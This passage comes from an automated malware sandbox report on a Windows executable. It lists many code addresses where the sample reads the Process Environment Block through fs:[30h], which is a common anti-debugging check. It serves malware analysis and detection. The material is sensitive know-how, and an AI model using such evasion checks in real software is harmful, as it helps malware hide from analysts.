                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102A2C3 mov eax, dword ptr fs:[00000030h]11_2_0102A2C3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102A2C3 mov eax, dword ptr fs:[00000030h]11_2_0102A2C3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102A2C3 mov eax, dword ptr fs:[00000030h]11_2_0102A2C3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102A2C3 mov eax, dword ptr fs:[00000030h]11_2_0102A2C3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F62D6 mov eax, dword ptr fs:[00000030h]11_2_010F62D6
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010302E1 mov eax, dword ptr fs:[00000030h]11_2_010302E1
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010302E1 mov eax, dword ptr fs:[00000030h]11_2_010302E1
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010302E1 mov eax, dword ptr fs:[00000030h]11_2_010302E1
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B6500 mov eax, dword ptr fs:[00000030h]11_2_010B6500
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F4500 mov eax, dword ptr fs:[00000030h]11_2_010F4500
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F4500 mov eax, dword ptr fs:[00000030h]11_2_010F4500
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F4500 mov eax, dword ptr fs:[00000030h]11_2_010F4500
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F4500 mov eax, dword ptr fs:[00000030h]11_2_010F4500
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F4500 mov eax, dword ptr fs:[00000030h]11_2_010F4500
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F4500 mov eax, dword ptr fs:[00000030h]11_2_010F4500
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F4500 mov eax, dword ptr fs:[00000030h]11_2_010F4500
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030535 mov eax, dword ptr fs:[00000030h]11_2_01030535
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030535 mov eax, dword ptr fs:[00000030h]11_2_01030535
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030535 mov eax, dword ptr fs:[00000030h]11_2_01030535
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030535 mov eax, dword ptr fs:[00000030h]11_2_01030535
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030535 mov eax, dword ptr fs:[00000030h]11_2_01030535
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030535 mov eax, dword ptr fs:[00000030h]11_2_01030535
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E53E mov eax, dword ptr fs:[00000030h]11_2_0104E53E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E53E mov eax, dword ptr fs:[00000030h]11_2_0104E53E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E53E mov eax, dword ptr fs:[00000030h]11_2_0104E53E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E53E mov eax, dword ptr fs:[00000030h]11_2_0104E53E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E53E mov eax, dword ptr fs:[00000030h]11_2_0104E53E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01028550 mov eax, dword ptr fs:[00000030h]11_2_01028550
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01028550 mov eax, dword ptr fs:[00000030h]11_2_01028550
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105656A mov eax, dword ptr fs:[00000030h]11_2_0105656A
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105656A mov eax, dword ptr fs:[00000030h]11_2_0105656A
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105656A mov eax, dword ptr fs:[00000030h]11_2_0105656A
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01022582 mov eax, dword ptr fs:[00000030h]11_2_01022582
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01022582 mov ecx, dword ptr fs:[00000030h]11_2_01022582
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01054588 mov eax, dword ptr fs:[00000030h]11_2_01054588
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E59C mov eax, dword ptr fs:[00000030h]11_2_0105E59C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A05A7 mov eax, dword ptr fs:[00000030h]11_2_010A05A7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A05A7 mov eax, dword ptr fs:[00000030h]11_2_010A05A7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A05A7 mov eax, dword ptr fs:[00000030h]11_2_010A05A7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010445B1 mov eax, dword ptr fs:[00000030h]11_2_010445B1
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010445B1 mov eax, dword ptr fs:[00000030h]11_2_010445B1
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E5CF mov eax, dword ptr fs:[00000030h]11_2_0105E5CF
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E5CF mov eax, dword ptr fs:[00000030h]11_2_0105E5CF
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010265D0 mov eax, dword ptr fs:[00000030h]11_2_010265D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105A5D0 mov eax, dword ptr fs:[00000030h]11_2_0105A5D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105A5D0 mov eax, dword ptr fs:[00000030h]11_2_0105A5D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010225E0 mov eax, dword ptr fs:[00000030h]11_2_010225E0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E5E7 mov eax, dword ptr fs:[00000030h]11_2_0104E5E7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E5E7 mov eax, dword ptr fs:[00000030h]11_2_0104E5E7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E5E7 mov eax, dword ptr fs:[00000030h]11_2_0104E5E7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E5E7 mov eax, dword ptr fs:[00000030h]11_2_0104E5E7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E5E7 mov eax, dword ptr fs:[00000030h]11_2_0104E5E7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E5E7 mov eax, dword ptr fs:[00000030h]11_2_0104E5E7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E5E7 mov eax, dword ptr fs:[00000030h]11_2_0104E5E7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E5E7 mov eax, dword ptr fs:[00000030h]11_2_0104E5E7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105C5ED mov eax, dword ptr fs:[00000030h]11_2_0105C5ED
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105C5ED mov eax, dword ptr fs:[00000030h]11_2_0105C5ED
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01058402 mov eax, dword ptr fs:[00000030h]11_2_01058402
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01058402 mov eax, dword ptr fs:[00000030h]11_2_01058402
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01058402 mov eax, dword ptr fs:[00000030h]11_2_01058402
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101E420 mov eax, dword ptr fs:[00000030h]11_2_0101E420
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101E420 mov eax, dword ptr fs:[00000030h]11_2_0101E420
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101E420 mov eax, dword ptr fs:[00000030h]11_2_0101E420
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101C427 mov eax, dword ptr fs:[00000030h]11_2_0101C427
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A6420 mov eax, dword ptr fs:[00000030h]11_2_010A6420
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A6420 mov eax, dword ptr fs:[00000030h]11_2_010A6420
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A6420 mov eax, dword ptr fs:[00000030h]11_2_010A6420
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A6420 mov eax, dword ptr fs:[00000030h]11_2_010A6420
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A6420 mov eax, dword ptr fs:[00000030h]11_2_010A6420
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A6420 mov eax, dword ptr fs:[00000030h]11_2_010A6420
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A6420 mov eax, dword ptr fs:[00000030h]11_2_010A6420
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105A430 mov eax, dword ptr fs:[00000030h]11_2_0105A430
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E443 mov eax, dword ptr fs:[00000030h]11_2_0105E443
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E443 mov eax, dword ptr fs:[00000030h]11_2_0105E443
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E443 mov eax, dword ptr fs:[00000030h]11_2_0105E443
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E443 mov eax, dword ptr fs:[00000030h]11_2_0105E443
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E443 mov eax, dword ptr fs:[00000030h]11_2_0105E443
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E443 mov eax, dword ptr fs:[00000030h]11_2_0105E443
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E443 mov eax, dword ptr fs:[00000030h]11_2_0105E443
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E443 mov eax, dword ptr fs:[00000030h]11_2_0105E443
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010DA456 mov eax, dword ptr fs:[00000030h]11_2_010DA456
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101645D mov eax, dword ptr fs:[00000030h]11_2_0101645D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104245A mov eax, dword ptr fs:[00000030h]11_2_0104245A
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010AC460 mov ecx, dword ptr fs:[00000030h]11_2_010AC460
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104A470 mov eax, dword ptr fs:[00000030h]11_2_0104A470
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104A470 mov eax, dword ptr fs:[00000030h]11_2_0104A470
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104A470 mov eax, dword ptr fs:[00000030h]11_2_0104A470
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010DA49A mov eax, dword ptr fs:[00000030h]11_2_010DA49A
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010264AB mov eax, dword ptr fs:[00000030h]11_2_010264AB
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010544B0 mov ecx, dword ptr fs:[00000030h]11_2_010544B0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010AA4B0 mov eax, dword ptr fs:[00000030h]11_2_010AA4B0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010204E5 mov ecx, dword ptr fs:[00000030h]11_2_010204E5
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105C700 mov eax, dword ptr fs:[00000030h]11_2_0105C700
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01020710 mov eax, dword ptr fs:[00000030h]11_2_01020710
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01050710 mov eax, dword ptr fs:[00000030h]11_2_01050710
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105C720 mov eax, dword ptr fs:[00000030h]11_2_0105C720
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105C720 mov eax, dword ptr fs:[00000030h]11_2_0105C720
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105273C mov eax, dword ptr fs:[00000030h]11_2_0105273C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105273C mov ecx, dword ptr fs:[00000030h]11_2_0105273C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105273C mov eax, dword ptr fs:[00000030h]11_2_0105273C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109C730 mov eax, dword ptr fs:[00000030h]11_2_0109C730
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105674D mov esi, dword ptr fs:[00000030h]11_2_0105674D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105674D mov eax, dword ptr fs:[00000030h]11_2_0105674D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105674D mov eax, dword ptr fs:[00000030h]11_2_0105674D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01020750 mov eax, dword ptr fs:[00000030h]11_2_01020750
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062750 mov eax, dword ptr fs:[00000030h]11_2_01062750
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062750 mov eax, dword ptr fs:[00000030h]11_2_01062750
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010AE75D mov eax, dword ptr fs:[00000030h]11_2_010AE75D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A4755 mov eax, dword ptr fs:[00000030h]11_2_010A4755
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01028770 mov eax, dword ptr fs:[00000030h]11_2_01028770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030770 mov eax, dword ptr fs:[00000030h]11_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030770 mov eax, dword ptr fs:[00000030h]11_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030770 mov eax, dword ptr fs:[00000030h]11_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030770 mov eax, dword ptr fs:[00000030h]11_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030770 mov eax, dword ptr fs:[00000030h]11_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030770 mov eax, dword ptr fs:[00000030h]11_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030770 mov eax, dword ptr fs:[00000030h]11_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030770 mov eax, dword ptr fs:[00000030h]11_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030770 mov eax, dword ptr fs:[00000030h]11_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030770 mov eax, dword ptr fs:[00000030h]11_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030770 mov eax, dword ptr fs:[00000030h]11_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030770 mov eax, dword ptr fs:[00000030h]11_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C678E mov eax, dword ptr fs:[00000030h]11_2_010C678E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010207AF mov eax, dword ptr fs:[00000030h]11_2_010207AF
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010D47A0 mov eax, dword ptr fs:[00000030h]11_2_010D47A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102C7C0 mov eax, dword ptr fs:[00000030h]11_2_0102C7C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A07C3 mov eax, dword ptr fs:[00000030h]11_2_010A07C3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010427ED mov eax, dword ptr fs:[00000030h]11_2_010427ED
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010427ED mov eax, dword ptr fs:[00000030h]11_2_010427ED
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010427ED mov eax, dword ptr fs:[00000030h]11_2_010427ED
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010AE7E1 mov eax, dword ptr fs:[00000030h]11_2_010AE7E1
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010247FB mov eax, dword ptr fs:[00000030h]11_2_010247FB
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010247FB mov eax, dword ptr fs:[00000030h]11_2_010247FB
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109E609 mov eax, dword ptr fs:[00000030h]11_2_0109E609
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103260B mov eax, dword ptr fs:[00000030h]11_2_0103260B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103260B mov eax, dword ptr fs:[00000030h]11_2_0103260B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103260B mov eax, dword ptr fs:[00000030h]11_2_0103260B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103260B mov eax, dword ptr fs:[00000030h]11_2_0103260B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103260B mov eax, dword ptr fs:[00000030h]11_2_0103260B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103260B mov eax, dword ptr fs:[00000030h]11_2_0103260B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103260B mov eax, dword ptr fs:[00000030h]11_2_0103260B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062619 mov eax, dword ptr fs:[00000030h]11_2_01062619
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103E627 mov eax, dword ptr fs:[00000030h]11_2_0103E627
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01056620 mov eax, dword ptr fs:[00000030h]11_2_01056620
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01058620 mov eax, dword ptr fs:[00000030h]11_2_01058620
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102262C mov eax, dword ptr fs:[00000030h]11_2_0102262C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103C640 mov eax, dword ptr fs:[00000030h]11_2_0103C640
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010E866E mov eax, dword ptr fs:[00000030h]11_2_010E866E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010E866E mov eax, dword ptr fs:[00000030h]11_2_010E866E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105A660 mov eax, dword ptr fs:[00000030h]11_2_0105A660
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105A660 mov eax, dword ptr fs:[00000030h]11_2_0105A660
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01052674 mov eax, dword ptr fs:[00000030h]11_2_01052674
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01024690 mov eax, dword ptr fs:[00000030h]11_2_01024690
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01024690 mov eax, dword ptr fs:[00000030h]11_2_01024690
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105C6A6 mov eax, dword ptr fs:[00000030h]11_2_0105C6A6
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010566B0 mov eax, dword ptr fs:[00000030h]11_2_010566B0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105A6C7 mov ebx, dword ptr fs:[00000030h]11_2_0105A6C7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105A6C7 mov eax, dword ptr fs:[00000030h]11_2_0105A6C7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109E6F2 mov eax, dword ptr fs:[00000030h]11_2_0109E6F2
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109E6F2 mov eax, dword ptr fs:[00000030h]11_2_0109E6F2
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109E6F2 mov eax, dword ptr fs:[00000030h]11_2_0109E6F2
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109E6F2 mov eax, dword ptr fs:[00000030h]11_2_0109E6F2
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A06F1 mov eax, dword ptr fs:[00000030h]11_2_010A06F1
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A06F1 mov eax, dword ptr fs:[00000030h]11_2_010A06F1
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109E908 mov eax, dword ptr fs:[00000030h]11_2_0109E908
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109E908 mov eax, dword ptr fs:[00000030h]11_2_0109E908
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010AC912 mov eax, dword ptr fs:[00000030h]11_2_010AC912
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01018918 mov eax, dword ptr fs:[00000030h]11_2_01018918
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01018918 mov eax, dword ptr fs:[00000030h]11_2_01018918
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A892A mov eax, dword ptr fs:[00000030h]11_2_010A892A
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B892B mov eax, dword ptr fs:[00000030h]11_2_010B892B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A0946 mov eax, dword ptr fs:[00000030h]11_2_010A0946
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F4940 mov eax, dword ptr fs:[00000030h]11_2_010F4940
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01046962 mov eax, dword ptr fs:[00000030h]11_2_01046962
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01046962 mov eax, dword ptr fs:[00000030h]11_2_01046962
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01046962 mov eax, dword ptr fs:[00000030h]11_2_01046962
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0106096E mov eax, dword ptr fs:[00000030h]11_2_0106096E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0106096E mov edx, dword ptr fs:[00000030h]11_2_0106096E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0106096E mov eax, dword ptr fs:[00000030h]11_2_0106096E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C4978 mov eax, dword ptr fs:[00000030h]11_2_010C4978
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C4978 mov eax, dword ptr fs:[00000030h]11_2_010C4978
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010AC97C mov eax, dword ptr fs:[00000030h]11_2_010AC97C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
